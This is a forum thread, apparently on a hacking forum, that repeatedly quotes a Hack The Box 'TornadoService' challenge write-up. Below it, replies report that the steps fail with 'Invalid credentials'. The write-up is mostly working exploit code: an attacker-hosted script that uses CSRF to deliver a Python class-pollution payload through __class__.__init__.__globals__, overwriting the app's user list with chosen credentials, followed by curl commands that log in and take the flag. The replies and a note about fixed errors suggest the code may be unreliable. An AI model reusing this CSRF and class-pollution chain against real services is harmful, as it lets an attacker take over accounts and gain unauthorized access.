Posts: 245
Threads: 29
Joined: Nov 2023
(Sep 17, 2024, 11:17 PM)s0ft Wrote: (Aug 29, 2024, 04:00 PM)macavitysworld Wrote: HTB Web Challenge - TornadoService Writeup
- Serve the below index.html somewhere where you can access it with a domain name. You can use Ngrok if you have a paid plan
<script>
fetch('http://127.0.0.1:1337/get_tornados')
.then(response => response.json())
.then(machines => {
let firstMachine = machines[0].machine_id;
let json = {
"machine_id": firstMachine,
"status": "active",
"__class__": {
"__init__": {
"__globals__": {
"USERS": [{"username": "kittykat", "password": "kittykat"}]
}
}
}
};
return fetch(http://127.0.0.1:1337/update_tornado, {
method: "POST",
mode: "cors",
body: JSON.stringify(json)
});
})
</script>
- Access the vulnerable endpoint
curl "http://IP:PORT/report_tornado?ip=hosted file"
- Wait for 10-15 seconds so that csrf is triggered
- Once csrf is triggered, we can login with the new credentials
- save the login request
curl -X POST "http://IP:PORT/login" \
-H "Content-Type: application/json" \
-d '{"username": "kittykat", "password": "kittykat"}' \
-c cookie.txt
curl -X GET "http://IP:PORT/stats" \
-b cookie.txt
Dm me on telegram @macavitysworld if you are unable to get the flag
There was some errors in the js file provided earlier, all the issue has been fixed and the code has been updated 
Hmmm.. I ran everything and unfortunately am still receiving "Invalid credentials". Any suggestions?
Dm me on tg
Thanks @paw for the rank!!
Posts: 16
Threads: 0
Joined: Oct 2023
(Aug 29, 2024, 04:00 PM)macavitysworld Wrote: HTB Web Challenge - TornadoService Writeup
- Serve the below index.html somewhere where you can access it with a domain name. You can use Ngrok if you have a paid plan
<script>
fetch('http://127.0.0.1:1337/get_tornados')
.then(response => response.json())
.then(machines => {
let firstMachine = machines[0].machine_id;
let json = {
"machine_id": firstMachine,
"status": "active",
"__class__": {
"__init__": {
"__globals__": {
"USERS": [{"username": "kittykat", "password": "kittykat"}]
}
}
}
};
return fetch(http://127.0.0.1:1337/update_tornado, {
method: "POST",
mode: "cors",
body: JSON.stringify(json)
});
})
</script>
- Access the vulnerable endpoint
curl "http://IP:PORT/report_tornado?ip=hosted file"
- Wait for 10-15 seconds so that csrf is triggered
- Once csrf is triggered, we can login with the new credentials
- save the login request
curl -X POST "http://IP:PORT/login" \
-H "Content-Type: application/json" \
-d '{"username": "kittykat", "password": "kittykat"}' \
-c cookie.txt
curl -X GET "http://IP:PORT/stats" \
-b cookie.txt
Dm me on telegram @macavitysworld if you are unable to get the flag
There was some errors in the js file provided earlier, all the issue has been fixed and the code has been updated
Great stuff once again
Posts: 1
Threads: 0
Joined: Sep 2024
Sep 18, 2024, 09:08 PM
(This post was last modified: Sep 18, 2024, 09:13 PM by iamukk.)
for some reasons its not working for me , I am getting {"error": {"type": "Unauthorized", "message": "Invalid credentials"}}% error on both local and remote machine
any suggestions ? @soft, how did you fix the issue ?
(Sep 18, 2024, 10:42 AM)s0ft Wrote: (Sep 18, 2024, 07:38 AM)macavitysworld Wrote: (Sep 17, 2024, 11:17 PM)s0ft Wrote: (Aug 29, 2024, 04:00 PM)macavitysworld Wrote: HTB Web Challenge - TornadoService Writeup
- Serve the below index.html somewhere where you can access it with a domain name. You can use Ngrok if you have a paid plan
<script>
fetch('http://127.0.0.1:1337/get_tornados')
.then(response => response.json())
.then(machines => {
let firstMachine = machines[0].machine_id;
let json = {
"machine_id": firstMachine,
"status": "active",
"__class__": {
"__init__": {
"__globals__": {
"USERS": [{"username": "kittykat", "password": "kittykat"}]
}
}
}
};
return fetch(http://127.0.0.1:1337/update_tornado, {
method: "POST",
mode: "cors",
body: JSON.stringify(json)
});
})
</script>
- Access the vulnerable endpoint
curl "http://IP:PORT/report_tornado?ip=hosted file"
- Wait for 10-15 seconds so that csrf is triggered
- Once csrf is triggered, we can login with the new credentials
- save the login request
curl -X POST "http://IP:PORT/login" \
-H "Content-Type: application/json" \
-d '{"username": "kittykat", "password": "kittykat"}' \
-c cookie.txt
curl -X GET "http://IP:PORT/stats" \
-b cookie.txt
Dm me on telegram @macavitysworld if you are unable to get the flag
There was some errors in the js file provided earlier, all the issue has been fixed and the code has been updated
Hmmm.. I ran everything and unfortunately am still receiving "Invalid credentials". Any suggestions?
Dm me on tg
You're a legend, thank you very much - not an avid user of breachforums but kudos to you <3
how did you fix the issue ?
I am also getting same error
{"error": {"type": "Unauthorized", "message": "Invalid credentials"}}%
|
